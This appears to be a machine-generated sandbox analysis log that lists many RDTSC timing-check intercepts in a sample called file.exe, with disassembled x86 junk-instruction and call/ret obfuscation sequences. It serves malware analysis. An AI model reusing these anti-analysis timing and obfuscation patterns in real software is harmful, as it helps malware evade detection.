                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54C9E second address: D54CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A79h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54CC3 second address: D54CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54CC7 second address: D54CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ecx 0x0000000e jmp 00007FD288CC4A6Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54CE6 second address: D54CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85CFh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58AB0 second address: D58AC7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD288CC4A72h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58AC7 second address: D58AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58AD4 second address: D58AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58AD8 second address: D58B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D1h 0x00000007 jnp 00007FD2884F85C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FD2884F85D6h 0x00000015 jmp 00007FD2884F85D0h 0x0000001a jmp 00007FD2884F85CAh 0x0000001f popad 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58B25 second address: D58B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58B2D second address: D58B33 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59505 second address: D5950C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A09A second address: D5A0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2884F85D8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A1F7 second address: D5A202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD288CC4A66h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A33E second address: D5A347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A347 second address: D5A34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A34B second address: D5A34F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AF59 second address: D5AF5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B90A second address: D5B90E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B90E second address: D5B917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D504 second address: D5D50A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DFF3 second address: D5DFF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61168 second address: D611AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FD2884F85E5h 0x0000000e jmp 00007FD2884F85D5h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D50A second address: D5D510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D510 second address: D5D514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64273 second address: D64277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D652E6 second address: D652EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D644A0 second address: D644AA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D652EB second address: D65311 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD2884F85D1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD2884F85CDh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D654E1 second address: D654E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D654E7 second address: D654EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D654EC second address: D65508 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD288CC4A70h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D671EA second address: D6726D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FD2884F85C8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 js 00007FD2884F85CAh 0x00000029 mov bx, A3F0h 0x0000002d push 00000000h 0x0000002f jno 00007FD2884F85D3h 0x00000035 mov dword ptr [ebp+12459F28h], esi 0x0000003b push 00000000h 0x0000003d jns 00007FD2884F85CCh 0x00000043 mov bx, 1E5Eh 0x00000047 xchg eax, esi 0x00000048 jl 00007FD2884F85D7h 0x0000004e jbe 00007FD2884F85D1h 0x00000054 jmp 00007FD2884F85CBh 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D663D6 second address: D6643F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or edi, 7500FA63h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 or bx, CC53h 0x00000025 mov eax, dword ptr [ebp+122D0099h] 0x0000002b and edi, 6CFCA46Fh 0x00000031 mov edi, dword ptr [ebp+122D39D7h] 0x00000037 push FFFFFFFFh 0x00000039 sub dword ptr [ebp+122D2608h], ecx 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 jmp 00007FD288CC4A76h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65508 second address: D6550F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6726D second address: D67271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6643F second address: D66444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67271 second address: D67275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66444 second address: D66449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66449 second address: D6644F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68214 second address: D68218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68218 second address: D6821C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67489 second address: D674A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6821C second address: D68222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D674A6 second address: D674AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D674AA second address: D674B4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A45C second address: D6A4C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FD2884F85C6h 0x00000009 jmp 00007FD2884F85D4h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 cmc 0x00000015 push 00000000h 0x00000017 jmp 00007FD2884F85CAh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FD2884F85C8h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 jmp 00007FD2884F85D2h 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jno 00007FD2884F85C6h 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A4C8 second address: D6A4D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A4D1 second address: D6A4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A4D7 second address: D6A4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD288CC4A6Ch 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D65F second address: D6D665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D665 second address: D6D669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D669 second address: D6D713 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FD2884F85C8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push edx 0x00000028 jno 00007FD2884F85C9h 0x0000002e pop ebx 0x0000002f jmp 00007FD2884F85D3h 0x00000034 push 00000000h 0x00000036 call 00007FD2884F85D7h 0x0000003b pop edi 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007FD2884F85C8h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000017h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 xchg eax, esi 0x00000059 push edx 0x0000005a jmp 00007FD2884F85D8h 0x0000005f pop edx 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D713 second address: D6D719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C572 second address: D6C58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD2884F85D0h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C58C second address: D6C592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70773 second address: D70777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C592 second address: D6C598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C665 second address: D6C669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72906 second address: D7290A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7290A second address: D7290E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7290E second address: D7291A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7291A second address: D72929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FD2884F85C6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D719E5 second address: D719EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D739C5 second address: D739C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D739C9 second address: D73A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FD288CC4A68h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 push eax 0x00000023 cld 0x00000024 pop edi 0x00000025 push 00000000h 0x00000027 mov ebx, ecx 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c xor ecx, dword ptr [ebp+122D1BF1h] 0x00000032 and ax, 4915h 0x00000037 popad 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jp 00007FD288CC4A66h 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72ABF second address: D72AC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73A14 second address: D73A28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD288CC4A6Ch 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72AC6 second address: D72AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FD2884F85D3h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72AE3 second address: D72AE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72AE9 second address: D72AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73B67 second address: D73B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73B6B second address: D73B75 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73C51 second address: D73C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73C55 second address: D73C69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7768A second address: D776C9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD288CC4A71h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD288CC4A73h 0x00000011 push esi 0x00000012 jc 00007FD288CC4A66h 0x00000018 jmp 00007FD288CC4A6Dh 0x0000001d pop esi 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D776C9 second address: D776D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FD2884F85C6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A6E second address: D16A81 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnl 00007FD288CC4A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A81 second address: D16A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A85 second address: D16A92 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E60C second address: D7E610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E610 second address: D7E625 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a jns 00007FD288CC4A68h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DFB8 second address: D7DFD1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD2884F85D3h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DFD1 second address: D7DFD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DFD7 second address: D7DFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DFDB second address: D7DFE5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD288CC4A66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E197 second address: D0E1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD2884F85D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E1BD second address: D0E1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E1C1 second address: D0E1DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FD2884F85D0h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E1DD second address: D0E1F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A70h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85D3E second address: D85D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85D42 second address: D85D76 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FD288CC4A74h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edx 0x00000013 jg 00007FD288CC4A68h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85D76 second address: D85D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18598 second address: D185B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A77h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89B1C second address: D89B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
